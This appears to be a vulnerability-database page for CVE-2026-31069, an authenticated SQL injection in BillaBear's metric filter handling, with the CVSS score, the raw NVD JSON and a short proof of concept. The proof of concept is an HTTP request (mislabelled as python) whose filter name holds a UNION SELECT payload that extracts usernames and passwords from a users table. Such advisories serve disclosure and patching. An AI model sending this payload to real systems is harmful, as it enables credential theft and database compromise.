Security Vulnerability Report
中文
CVE-2026-31069 CVSS 8.8 HIGH

CVE-2026-31069

Published: 2026-05-19 16:16:20
Last Modified: 2026-05-20 14:16:40
Source: [email protected]

Description

BillaBear (all versions prior to Jan 2026) contains a SQL Injection vulnerability in the EventRepository. User-controlled input from metric filter names and aggregation properties is directly interpolated into SQL queries using sprintf() without proper sanitization or identifier quoting. Although filter values are parameterized, the filter identifiers (keys) are not. An authenticated attacker with ROLE_ACCOUNT_MANAGER permissions can exploit this to execute arbitrary SQL commands.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

BillaBear < 2026年1月版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * Conceptual PoC for CVE-2026-31069 * Exploiting the filter name in EventRepository */ POST /api/v1/metrics/filter HTTP/1.1 Host: target-billabear.com Authorization: Bearer <valid_account_manager_token> Content-Type: application/json { "filters": [ { // Malicious payload injected into the filter identifier (key) "name": "id) UNION SELECT 1,username,password,4 FROM users-- -", "operator": "eq", "value": "test" } ] } /* * Explanation: * The backend likely constructs SQL like: * sprintf("... WHERE %s = ...", $filter['name']) * The payload closes the parenthesis and appends a UNION SELECT to extract data. */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31069", "sourceIdentifier": "[email protected]", "published": "2026-05-19T16:16:20.230", "lastModified": "2026-05-20T14:16:40.150", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "BillaBear (all versions prior to Jan 2026) contains a SQL Injection vulnerability in the EventRepository. User-controlled input from metric filter names and aggregation properties is directly interpolated into SQL queries using sprintf() without proper sanitization or identifier quoting. Although filter values are parameterized, the filter identifiers (keys) are not. An authenticated attacker with ROLE_ACCOUNT_MANAGER permissions can exploit this to execute arbitrary SQL commands."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://gist.github.com/nedlir/2377ba6e7fa2ad957210b52aa8e400d9", "source": "[email protected]"}, {"url": "https://gist.github.com/nedlir/a50725b94650467f0593b8f4009ae19e", "source": "[email protected]"}, {"url": "https://github.com/BillaBear/billabear", "source": "[email protected]"}, {"url": "https://gist.github.com/nedlir/a50725b94650467f0593b8f4009ae19e", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.